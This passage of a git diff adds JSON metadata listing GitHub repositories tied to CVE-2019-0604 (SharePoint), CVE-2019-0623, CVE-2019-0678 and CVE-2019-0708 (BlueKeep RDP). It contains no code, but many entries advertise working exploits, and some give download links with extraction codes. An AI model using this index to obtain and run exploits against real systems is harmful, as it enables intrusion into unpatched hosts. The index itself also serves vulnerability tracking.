"html_url": "https:\/\/github.com\/likekabin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/likekabin\/CVE-2019-0604_sharepoint_CVE", + "description": null, + "fork": false, + "created_at": "2019-04-04T03:17:30Z", + "updated_at": "2024-08-12T19:47:35Z", + "pushed_at": "2019-04-04T03:17:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 193926769, + "name": "CVE-2019-0604", + "full_name": "k8gege\/CVE-2019-0604", + "owner": { + "login": "k8gege", + "id": 42312878, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42312878?v=4", + "html_url": "https:\/\/github.com\/k8gege", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k8gege\/CVE-2019-0604", + "description": "cve-2019-0604 SharePoint RCE exploit", + "fork": false, + "created_at": "2019-06-26T15:00:29Z", + "updated_at": "2024-08-12T19:50:29Z", + "pushed_at": "2019-10-18T14:49:10Z", + "stargazers_count": 101, + "watchers_count": 101, + "has_discussions": false, + "forks_count": 67, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-0604", + "exp", + "exploit", + "hacking", + "k8cscan", + "pentest", + "sharepoint" + ], + "visibility": "public", + "forks": 67, + "watchers": 101, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 208650796, + "name": "CVE-2019-0604", + "full_name": "m5050\/CVE-2019-0604", + "owner": { + "login": "m5050", + "id": 18764171, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18764171?v=4", + "html_url": "https:\/\/github.com\/m5050", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m5050\/CVE-2019-0604", + "description": "CVE-2019-0604: SharePoint RCE detection rules and sample PCAP", + "fork": false, + "created_at": "2019-09-15T20:06:54Z", + "updated_at": "2024-08-12T19:53:02Z", + "pushed_at": "2019-09-17T19:40:29Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 227013447, + "name": "CVE-2019-0604", + "full_name": "boxhg\/CVE-2019-0604", + "owner": { + "login": "boxhg", + "id": 40994449, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40994449?v=4", + "html_url": "https:\/\/github.com\/boxhg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/boxhg\/CVE-2019-0604", + "description": "详解 k8gege的SharePoint RCE exploit cve-2019-0604-exp.py的代码,动手制作自己的payload", + "fork": false, + "created_at": "2019-12-10T02:39:57Z", + "updated_at": "2024-08-12T19:55:36Z", + "pushed_at": "2021-04-02T09:12:32Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 30, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 360506351, + "name": "weaponized-0604", + "full_name": "Gh0st0ne\/weaponized-0604", + "owner": { + "login": "Gh0st0ne", + "id": 47971115, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47971115?v=4", + "html_url": "https:\/\/github.com\/Gh0st0ne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Gh0st0ne\/weaponized-0604", + "description": "Automated tool to exploit sharepoint CVE-2019-0604", + "fork": false, + "created_at": "2021-04-22T12:11:22Z", + "updated_at": "2024-09-30T10:43:25Z", + "pushed_at": "2021-02-12T14:04:25Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 687505103, + "name": "cve-2019-0604-SP2010-netv3.5", + "full_name": "davidlebr1\/cve-2019-0604-SP2010-netv3.5", + "owner": { + "login": "davidlebr1", + "id": 838845, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/838845?v=4", + "html_url": "https:\/\/github.com\/davidlebr1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/davidlebr1\/cve-2019-0604-SP2010-netv3.5", + "description": "Generate Seralize Payload for CVE-2019-0604 for Sharepoint 2010 SP2 .net 3.5", + "fork": false, + "created_at": "2023-09-05T13:47:17Z", + "updated_at": "2023-09-05T13:51:36Z", + "pushed_at": "2023-09-05T13:51:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0623.json b/2019/CVE-2019-0623.json new file mode 100644 index 0000000000..0d58c7c396 --- /dev/null +++ b/2019/CVE-2019-0623.json @@ -0,0 +1,33 @@ +[ + { + "id": 527923849, + "name": "CVE-2019-0623-32-exp", + "full_name": "Anti-ghosts\/CVE-2019-0623-32-exp", + "owner": { + "login": "Anti-ghosts", + "id": 74170859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74170859?v=4", + "html_url": "https:\/\/github.com\/Anti-ghosts", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Anti-ghosts\/CVE-2019-0623-32-exp", + "description": "win32k", + "fork": false, + "created_at": "2022-08-23T09:40:24Z", + "updated_at": "2024-06-09T21:25:48Z", + "pushed_at": "2020-08-07T06:29:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0678.json b/2019/CVE-2019-0678.json new file mode 100644 index 0000000000..c42c02dbb2 --- /dev/null +++ b/2019/CVE-2019-0678.json @@ -0,0 +1,33 @@ +[ + { + "id": 197768361, + "name": "CVE-2019-0678", + "full_name": "sharmasandeepkr\/CVE-2019-0678", + "owner": { + "login": "sharmasandeepkr", + "id": 16163884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16163884?v=4", + "html_url": "https:\/\/github.com\/sharmasandeepkr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sharmasandeepkr\/CVE-2019-0678", + "description": "Microsoft Edge Elevation of Privilege Vulnerability", + "fork": false, + "created_at": "2019-07-19T12:23:27Z", + "updated_at": "2022-12-01T13:46:39Z", + "pushed_at": "2019-07-19T12:15:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0708.json b/2019/CVE-2019-0708.json new file mode 100644 index 0000000000..9cb5446155 --- /dev/null +++ b/2019/CVE-2019-0708.json @@ -0,0 +1,3756 @@ +[ + { + "id": 186699764, + "name": "CVE-2019-0708-poc", + "full_name": "hook-s3c\/CVE-2019-0708-poc", + "owner": { + "login": "hook-s3c", + "id": 31825993, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31825993?v=4", + "html_url": "https:\/\/github.com\/hook-s3c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hook-s3c\/CVE-2019-0708-poc", + "description": "proof of concept exploit for Microsoft Windows 7 and Server 2008 RDP vulnerability", + "fork": false, + "created_at": "2019-05-14T21:00:50Z", + "updated_at": "2024-08-12T19:48:53Z", + "pushed_at": "2019-05-15T14:23:11Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-0708", + "exploit", + "rdp", + "windows" + ], + "visibility": "public", + "forks": 23, + "watchers": 47, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 186705259, + "name": "CVE-2019-0708", + "full_name": "SherlockSec\/CVE-2019-0708", + "owner": { + "login": "SherlockSec", + "id": 37545173, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37545173?v=4", + "html_url": "https:\/\/github.com\/SherlockSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SherlockSec\/CVE-2019-0708", + "description": "A Win7 RDP exploit", + "fork": false, + "created_at": "2019-05-14T21:47:33Z", + "updated_at": "2022-11-03T11:49:09Z", + "pushed_at": "2019-05-14T21:51:14Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 63, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 63, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 186731659, + "name": "CVE-2019-0708-PoC", + "full_name": "yetiddbb\/CVE-2019-0708-PoC", + "owner": { + "login": "yetiddbb", + "id": 12067282, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12067282?v=4", + "html_url": "https:\/\/github.com\/yetiddbb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yetiddbb\/CVE-2019-0708-PoC", + "description": "CVE-2019-0708", + "fork": false, + "created_at": "2019-05-15T02:03:50Z", + "updated_at": "2019-05-15T02:06:00Z", + "pushed_at": "2019-05-15T02:03:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 186734186, + "name": "CVE-2019-0708-exploit", + "full_name": "p0p0p0\/CVE-2019-0708-exploit", + "owner": { + "login": "p0p0p0", + "id": 38487045, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38487045?v=4", + "html_url": "https:\/\/github.com\/p0p0p0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p0p0p0\/CVE-2019-0708-exploit", + "description": "CVE-2019-0708-exploit", + "fork": false, + "created_at": "2019-05-15T02:24:21Z", + "updated_at": "2024-11-20T06:13:32Z", + "pushed_at": "2019-05-15T02:26:46Z", + "stargazers_count": 117, + "watchers_count": 117, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 24, + "watchers": 117, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 186738633, + "name": "CVE-2019-0708-Exploit", + "full_name": "rockmelodies\/CVE-2019-0708-Exploit", + "owner": { + "login": "rockmelodies", + "id": 24653177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24653177?v=4", + "html_url": "https:\/\/github.com\/rockmelodies", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rockmelodies\/CVE-2019-0708-Exploit", + "description": "Using CVE-2019-0708 to Locally Promote Privileges in Windows 10 System", + "fork": false, + "created_at": "2019-05-15T02:58:04Z", + "updated_at": "2024-08-12T19:48:54Z", + "pushed_at": "2019-05-15T02:51:24Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 32, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 32, + "watchers": 31, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 186746847, + "name": "CVE-2019-0708", + "full_name": "anquanscan\/CVE-2019-0708", + "owner": { + "login": "anquanscan", + "id": 5724472, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5724472?v=4", + "html_url": "https:\/\/github.com\/anquanscan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/anquanscan\/CVE-2019-0708", + "description": "CVE-2019-0708 exp", + "fork": false, + "created_at": "2019-05-15T04:05:07Z", + "updated_at": "2024-08-12T19:48:54Z", + "pushed_at": "2019-05-15T08:29:38Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 186769422, + "name": "Dark-Network-CVE-2019-0708", + "full_name": "xiyangzuishuai\/Dark-Network-CVE-2019-0708", + "owner": { + "login": "xiyangzuishuai", + "id": 50652254, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50652254?v=4", + "html_url": "https:\/\/github.com\/xiyangzuishuai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiyangzuishuai\/Dark-Network-CVE-2019-0708", + "description": "Dark Net Sunset New Release CVE-2019-0708", + "fork": false, + "created_at": "2019-05-15T07:09:24Z", + "updated_at": "2019-05-15T07:09:24Z", + "pushed_at": "2019-05-15T07:09:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 186771926, + "name": "CVE-2019-0708", + "full_name": "temp-user-2014\/CVE-2019-0708", + "owner": { + "login": "temp-user-2014", + "id": 20980272, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20980272?v=4", + "html_url": "https:\/\/github.com\/temp-user-2014", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/temp-user-2014\/CVE-2019-0708", + "description": "CVE-2019-0708", + "fork": false, + "created_at": "2019-05-15T07:24:34Z", + "updated_at": "2024-08-12T19:48:54Z", + "pushed_at": "2019-05-15T07:32:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 186793386, + "name": "CVE-2019-0708", + "full_name": "areusecure\/CVE-2019-0708", + "owner": { + "login": "areusecure", + "id": 6128864, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6128864?v=4", + "html_url": "https:\/\/github.com\/areusecure", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/areusecure\/CVE-2019-0708", + "description": "Proof of concept exploit for CVE-2019-0708", + "fork": false, + "created_at": "2019-05-15T09:25:04Z", + "updated_at": "2019-07-02T14:34:05Z", + "pushed_at": "2019-05-15T09:25:43Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 186794712, + "name": "cve-2019-0708-2", + "full_name": "pry0cc\/cve-2019-0708-2", + "owner": { + "login": "pry0cc", + "id": 4334403, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4334403?v=4", + "html_url": "https:\/\/github.com\/pry0cc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pry0cc\/cve-2019-0708-2", + "description": "Testing my new bot out", + "fork": false, + "created_at": "2019-05-15T09:32:28Z", + "updated_at": "2024-08-12T19:48:55Z", + "pushed_at": "2019-05-15T14:55:23Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 186836054, + "name": "CVE-2019-0708-EXPloit", + "full_name": "sbkcbig\/CVE-2019-0708-EXPloit", + "owner": { + "login": "sbkcbig", + "id": 50097122, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50097122?v=4", + "html_url": "https:\/\/github.com\/sbkcbig", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sbkcbig\/CVE-2019-0708-EXPloit", + "description": "POCexp:https:\/\/pan.baidu.com\/s\/184gN1tJVIOYqOjaezM_VsA 提取码:e2k8 ", + "fork": false, + "created_at": "2019-05-15T13:49:09Z", + "updated_at": "2019-05-18T21:22:51Z", + "pushed_at": "2019-05-15T20:15:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 186838257, + "name": "CVE-2019-0708-EXPloit-3389", + "full_name": "sbkcbig\/CVE-2019-0708-EXPloit-3389", + "owner": { + "login": "sbkcbig", + "id": 50097122, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50097122?v=4", + "html_url": "https:\/\/github.com\/sbkcbig", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sbkcbig\/CVE-2019-0708-EXPloit-3389", + "description": "EXPloit-poc: https:\/\/pan.baidu.com\/s\/184gN1tJVIOYqOjaezM_VsA 提取码:e2k8", + "fork": false, + "created_at": "2019-05-15T14:00:38Z", + "updated_at": "2019-05-16T02:41:17Z", + "pushed_at": "2019-05-15T14:08:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 186840820, + "name": "MS_T120", + "full_name": "YSheldon\/MS_T120", + "owner": { + "login": "YSheldon", + "id": 36796460, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36796460?v=4", + "html_url": "https:\/\/github.com\/YSheldon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YSheldon\/MS_T120", + "description": "CVE-2019-0708", + "fork": false, + "created_at": "2019-05-15T14:14:04Z", + "updated_at": "2019-05-22T16:41:18Z", + "pushed_at": "2019-05-15T16:07:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 186849775, + "name": "CVE-2019-0708", + "full_name": "k8gege\/CVE-2019-0708", + "owner": { + "login": "k8gege", + "id": 42312878, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42312878?v=4", + "html_url": "https:\/\/github.com\/k8gege", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k8gege\/CVE-2019-0708", + "description": "3389远程桌面代码执行漏洞CVE-2019-0708批量检测工具(Rdpscan Bluekeep Check)", + "fork": false, + "created_at": "2019-05-15T15:01:38Z", + "updated_at": "2024-11-01T02:37:48Z", + "pushed_at": "2019-06-13T13:07:03Z", + "stargazers_count": 388, + "watchers_count": 388, + "has_discussions": false, + "forks_count": 189, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "3389", + "cve-2019-0708", + "exp", + "exploit", + "hacking", + "k8cscan", + "pentest", + "poc", + "rdp", + "security" + ], + "visibility": "public", + "forks": 189, + "watchers": 388, + "score": 0, + "subscribers_count": 16 + }, + { + "id": 186851202, + "name": "RDS_CVE-2019-0708", + "full_name": "hotdog777714\/RDS_CVE-2019-0708", + "owner": { + "login": "hotdog777714", + "id": 50670387, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50670387?v=4", + "html_url": "https:\/\/github.com\/hotdog777714", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hotdog777714\/RDS_CVE-2019-0708", + "description": "exploit CVE-2019-0708 RDS", + "fork": false, + "created_at": "2019-05-15T15:09:37Z", + "updated_at": "2024-08-12T19:48:55Z", + "pushed_at": "2019-05-15T08:17:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 186854844, + "name": "CVE-2019-0708", + "full_name": "jiansiting\/CVE-2019-0708", + "owner": { + "login": "jiansiting", + "id": 28823754, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28823754?v=4", + "html_url": "https:\/\/github.com\/jiansiting", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jiansiting\/CVE-2019-0708", + "description": "RDP POC", + "fork": false, + "created_at": "2019-05-15T15:29:05Z", + "updated_at": "2024-08-12T19:48:55Z", + "pushed_at": "2019-06-01T04:12:19Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 19, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 186863422, + "name": "CVE-2019-0708", + "full_name": "NullByteSuiteDevs\/CVE-2019-0708", + "owner": { + "login": "NullByteSuiteDevs", + "id": 15307246, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15307246?v=4", + "html_url": "https:\/\/github.com\/NullByteSuiteDevs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NullByteSuiteDevs\/CVE-2019-0708", + "description": "PoC exploit for BlueKeep (CVE-2019-0708)", + "fork": false, + "created_at": "2019-05-15T16:22:02Z", + "updated_at": "2024-08-12T19:48:55Z", + "pushed_at": "2019-05-15T16:24:12Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 186865180, + "name": "CVE-2019-0708", + "full_name": "thugcrowd\/CVE-2019-0708", + "owner": { + "login": "thugcrowd", + "id": 40207376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40207376?v=4", + "html_url": "https:\/\/github.com\/thugcrowd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thugcrowd\/CVE-2019-0708", + "description": "sup pry0cc :3", + "fork": false, + "created_at": "2019-05-15T16:33:31Z", + "updated_at": "2024-08-12T19:48:55Z", + "pushed_at": "2019-08-28T02:51:47Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 186877745, + "name": "CVE-2019-0708", + "full_name": "blacksunwen\/CVE-2019-0708", + "owner": { + "login": "blacksunwen", + "id": 26432151, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26432151?v=4", + "html_url": "https:\/\/github.com\/blacksunwen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/blacksunwen\/CVE-2019-0708", + "description": "CVE-2019-0708", + "fork": false, + "created_at": "2019-05-15T17:56:22Z", + "updated_at": "2024-08-12T19:48:56Z", + "pushed_at": "2019-05-29T10:17:16Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 186887802, + "name": "CVE-2019-0708", + "full_name": "infenet\/CVE-2019-0708", + "owner": { + "login": "infenet", + "id": 34240091, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34240091?v=4", + "html_url": "https:\/\/github.com\/infenet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/infenet\/CVE-2019-0708", + "description": null, + "fork": false, + "created_at": "2019-05-15T19:11:03Z", + "updated_at": "2024-08-12T19:48:56Z", + "pushed_at": "2019-05-15T18:35:48Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 186893561, + "name": "CVE-2019-0708", + "full_name": "n0auth\/CVE-2019-0708", + "owner": { + "login": "n0auth", + "id": 50678852, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50678852?v=4", + "html_url": "https:\/\/github.com\/n0auth", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n0auth\/CVE-2019-0708", + "description": "Totally legitimate", + "fork": false, + "created_at": "2019-05-15T19:53:34Z", + "updated_at": "2022-07-21T10:16:24Z", + "pushed_at": "2019-05-15T20:14:13Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 186895051, + "name": "CVE-2019-0708", + "full_name": "gildaaa\/CVE-2019-0708", + "owner": { + "login": "gildaaa", + "id": 46685831, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46685831?v=4", + "html_url": "https:\/\/github.com\/gildaaa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gildaaa\/CVE-2019-0708", + "description": null, + "fork": false, + "created_at": "2019-05-15T20:04:23Z", + "updated_at": "2024-08-12T19:48:56Z", + "pushed_at": "2019-05-15T20:05:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 186897948, + "name": "CVE-2019-0708-Poc-exploit", + "full_name": "sbkcbig\/CVE-2019-0708-Poc-exploit", + "owner": { + "login": "sbkcbig", + "id": 50097122, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50097122?v=4", + "html_url": "https:\/\/github.com\/sbkcbig", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sbkcbig\/CVE-2019-0708-Poc-exploit", + "description": "CVE-2019-0708 EXPloit-poc 漏洞描述 微软官方紧急发布安全补丁,修复了一个Windows远程桌面服务的远程代码执行漏洞CVE-2019-0708,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证,无需用户交互。当未经身份验证的攻击者使用RDP(常见端口3389)连接到目标系统并发送特制请求时,可以在目标系统上执行任意命令。甚至传播恶意蠕虫,感染内网其他机器。类似于2017年爆发的WannaCry等恶意勒索软件病毒。 漏洞评级 CVE-2019-0708 严重 安全建议 1、针对Windows 7及Windows Server 2008的用户,及时安装官方安全补丁:https:\/\/www.catalog.update.microsoft.com\/Search.aspx?q=KB4499175 2、针对Windows 2003及Windows XP的用户,及时更新系统版本或安装官方补丁:https:\/\/support.microsoft.com\/zh-cn\/help\/4500705\/customer-guidance-for-cve-2019-0708 CVE-2019-0708 EXPloit-poc 影响版本 Windows7 XP Windows 2003 Windows Server 2008 Windows Server 2008 R2 EXPloit-poc: https:\/\/pan.baidu.com\/s\/184gN1tJVIOYqOjaezM_VsA 提取码:e2k8", + "fork": false, + "created_at": "2019-05-15T20:26:34Z", + "updated_at": "2021-09-23T14:05:36Z", + "pushed_at": "2019-05-15T20:26:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 186908816, + "name": "CVE-2019-0708", + "full_name": "HackerJ0e\/CVE-2019-0708", + "owner": { + "login": "HackerJ0e", + "id": 19658269, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19658269?v=4", + "html_url": "https:\/\/github.com\/HackerJ0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HackerJ0e\/CVE-2019-0708", + "description": null, + "fork": false, + "created_at": "2019-05-15T22:03:28Z", + "updated_at": "2024-08-12T19:48:56Z", + "pushed_at": "2019-05-15T22:09:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 186922161, + "name": "CVE-2019-0708", + "full_name": "syriusbughunt\/CVE-2019-0708", + "owner": { + "login": "syriusbughunt", + "id": 45476916, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45476916?v=4", + "html_url": "https:\/\/github.com\/syriusbughunt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/syriusbughunt\/CVE-2019-0708", + "description": "PoC about CVE-2019-0708 (RDP; Windows 7, Windows Server 2003, Windows Server 2008) ", + "fork": false, + "created_at": "2019-05-16T00:34:23Z", + "updated_at": "2024-08-12T19:48:56Z", + "pushed_at": "2019-05-16T02:12:17Z", + "stargazers_count": 39, + "watchers_count": 39, + 